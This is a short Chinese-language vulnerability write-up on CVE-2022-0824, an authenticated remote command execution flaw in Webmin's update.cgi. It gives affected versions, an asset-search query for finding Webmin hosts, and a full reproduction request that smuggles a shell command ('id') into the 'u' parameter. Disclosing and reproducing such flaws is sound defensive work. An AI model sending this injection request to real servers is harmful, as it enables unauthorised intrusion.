Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824

# Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824 ## 漏洞描述 Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.990之前版本存在安全漏洞,...

Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824

漏洞描述

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。

Webmin 1.990之前版本存在安全漏洞,该漏洞源于软件中存在不正确的访问控制,攻击者可以利用该漏洞实现远程代码执行

漏洞影响

Webmin < 1.990

网络测绘

app="webmin"

漏洞复现

登录页面

img

登录后发送请求包

POST /package-updates/update.cgi HTTP/1.1
Cookie: sid=882af4543067bc6214d2c769325f3b2f
Referer: http:///package-updates/update.cgi?xnavigation=1

mode=new&search=ssh&redir=&redirdesc=&u=0;id;&confirm=Install+Now

img

  • 发表于 2024-07-12 18:47:49
  • 阅读 ( 2636 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计